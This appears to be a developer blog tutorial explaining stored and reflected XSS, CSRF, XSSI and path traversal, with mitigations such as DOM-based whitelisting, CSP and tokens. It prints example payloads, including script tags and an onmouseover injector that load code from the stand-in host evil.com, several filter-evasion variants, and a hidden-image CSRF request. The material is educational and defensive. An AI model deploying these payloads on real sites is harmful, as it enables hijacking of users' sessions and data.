Basic XSS and how to mitigate it
What is a Cross Site Scripting (XSS) attack?
The "cross site" part comes because the malicious code lives in the attacker's server (or a third party the attacker has access to). There are two ways an attacker can inject malicious code into a target machine: by submitting it to sites that accept user content like comments, etc (stored XSS), or by creating malicious URLs which when browsed to, trigger the attack (reflected XSS).
Typically malicious code includes some trick to include a script tag with the code that does the damage
<script src="http://evil.com/oh-dear.js"></script> Just an innocent comment...
To defuse the attacks, code and links need to be sanitised.
Can code from different domains be run in a web page? And why?
Yes. This is Cross-Origin Resource Sharing (CORS) and there are good reasons for it.
People want to import third party code into their sites - the classic example is Google Analytics. Or they want to use versions of popular libraries stored in a CDN (think JQuery, hosted on //code.jquery.com/), hoping that your visitor will have it already in their cache by the time they visit your site. Or, for sites still using HTTP 1, they want to put their assets on different subdomain, because a browser only downloads a limited amount of files in parallel from the same domain (think Yahoo, who put all their assets on //s.yimg.com). Or a global website with a variety of localised subdomains (think amazon.de, amazon.fr ... all downloading scripts from amazon.com). Or while developing, they want to download assets from the live site (say www.example.com) while developing on a subdomain (new-version.example.com)
Can you control which domain dowloads which scripts?
There is an http header which you can set in your server, Access-Control-Allow-Origin, to control who can download your assets. This is universally supported, but it doesn't really help with xss - it was really designed to stop people using your code on their pages, while you want the opposite: you want to stop their code on your pages.
What you really want is the Content Security Policy (CSP), which tells the browser what domains are allowed to be included in a page. This is relatively new and browser support is not quite there yet.
Stored XSS: File Upload displayed in an iframe
When a site allows users to upload files which are then displayed to other users in an iframe, an attacker could upload an HTML file with a script tag inside
This is my cool HTML page <script><!-- ... here I can do evil things ... --></script>
This is a relatively simple attack to mitigate. Since you control the server where the malicious code is stored, you can simply make sure the uploaded documents are saved on a separate subdomain, say
user-content.example.com, and then it won't have access to content on the main domain.
The classic reflected XSS attack tries to add a script tag to a url:
https://example.com/<script>..evil.. </script>. Of course the attach will never be so blatant. But browsers and other apps can do substitutions for special characters. Although these days they have built-in protection for most cases, it's interesting to know what we are being protected against. And anyway, some day you may find yourself coding for an environment where it doesn't exist
- URL % encoding
- double URL % encoding
- bad UTF-8 encoding
- HTML encoding
- double HTML encoding
- ASCII encoding
- ASCII encoding with hexadecimal
- ASCII encoding with unicode
- a C style encoding
The typical stored XSS attack you have a comment system or something, and the attacker tries to submit an HTML fragment with a script tag in it. There are different ways they can try that.
Simple attacks with script tags and HTML sanitasion
The obvious way may work, if the site was built by hobbysts or amateurs. But a simple regular expression is usually enough to stop that.
Great site! <script src="http://evil.com/xss.js"></script>
Regular expressions are not the best approach though. One reason is that you can easily match valid HTML, but attackers often get around them by submitting invalid HTML, taking advantage of the fact browsers are very forgiving. So they could submit the following
Great site! <a href="<script src="http://evil.com/xss.js"></script>
Or use hidden, non-rendered characters that can break a regular expression but are ignored by many browsers
Great site! <scr\0ipt src="http://evil.com/xss.js"></sc\0ript>
Or even simply upper case letters
Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>
The best approach to sanitasion is:
- parse the input into a DOM tree which is not rendered in the page
- have a white list of allowed tags and attributed, and go through every node of rendered DOM, deleting what is not the whitelist
- make sure any URLs and CSS attributes that are allowed are strictly sanitased. Careful of URLs using the
Using HTML attributes for xss attacks
<p ONMOUSEOVER="var d=document;var s=d.createElement('script');s.src='http://evil.com/xss.js';d.appendChild(s);">Great site!</p>
Using CSS attributes for xss attacks
If a site allows user to, say, choose a color for the text of the comments, you could submit something like
red;" onmouseover="...evil JS..." and then you can have
<!-- what the coder expected the final results to be when they built the site --> <p style="color:SOME_CUSTOM_COLOR;">My Home Page</p> <!-- what the attacker injected --> <p style="color:red;" onmouseover="...evil JS...">My Home Page</p>
A typical XSS fragment for a site that allows user submissions:
innocent looking text and then <span style=display:none>" + (...evil js..., "") + "</span> nothing to see here
That relies on the fact that the code will be inserted into the page via JS, with code such as
$someElement.innerHTML = "innocent looking text and then <span style=display:none>" + (...evil js..., "") + "</span> nothing to see here";
The not so common comman operator at
(...evil js..., "") returns the item on the right. The comma operator is often used when golfing / minifying, but not often when hand coding because of its unreadability. It simply executes the item on the left then ignores it and returns the one on the right:
var a = (1, 2); console.log(a); //2.
So it is important to escape strings that will be handled by JS with \x27 for single quotes and \x22 for doubles.
Reflected XSS via AJAX
Sometimes a site runs a fragment of a paragraph. An example is Google Translate:
https://translate.google.com/#en/de/...evil js..., where "...evil js..." could be
<script>evil js</script> and may be inserted in the translation box and translated, if the site isn't careful (obviously Google are). The way to handle this is to escape the
<> characters with
\x3c\x3e. It is also important to set the charset of your document with
Content-Type: text/html; charset=utf-8, to avoid the browser interpreting as utf-7, where
+AD4- are the encodings for
Cross-Site Request Forgery (XSRF)
This happens when an attacker stores some code in a page that requests a resource (often an image, but could be the favicon too for example) from a separate third party site, for example your bank, or Facebook (unlikely they don't protect themselves from such attacks, though). If you are already logged in the third party site, the browser will send cookies and everything else to that site. So you could have an exploit such as
An innocent message, la la <img // attacker hides the exploit style="display:none" // this is a (fake) command which the user needs to be logged in to run; // but if the user IS already logged in, then it will be run, // as the cookies will be sent. It doesn't matter that the response // is not an image, because of the display:none src="http://facebook.com/post/?msg=blah" >
To mitigate against those attacks, for a start make sure you use POST and not GET in your request. With your POST request, send a token with a timestamp, and expire login if the timestamp is too old (old = a few minutes). Generate a new token for every request. Maybe even generate different tokens for different types of requests.
Cross Site Script Inclusion (XSSI)
In this case the attacker includes your script in their page. That way they can read any variables accessible to your script, since the browser doesn't distinguish between the two environments. The simplest example is if someone has sensitive data simply embedded in the JS
// your_script.js var privateKey = "-----BEGIN RSA PRIVATE KEY-----" // etc // attacker_page.html <!doctype HTML> <html> <head> <script src="your_script.js"></script> <script>alert(privateKey)</script> ...
Another source of attacks is JSONP, as an attacker can simply override the callback function
The defence is simply not to put sensitive information inside JS or JSONP responses. Other steps are the same as for XSRF (use POST, use tokens), and make scripts non-executables by adding prefixes such as
The classic exploit which tries to trick the server into serving files outside the server root.
Few servers are configured by default to allow that, but be careful with customising configurations. Also, careful in allowing users to chose strings such as
brett/../../ as username.
This is just scratching the surface of XSS and related attacks; it is a specialist fields which, however, every front end developer should at least be familiar with.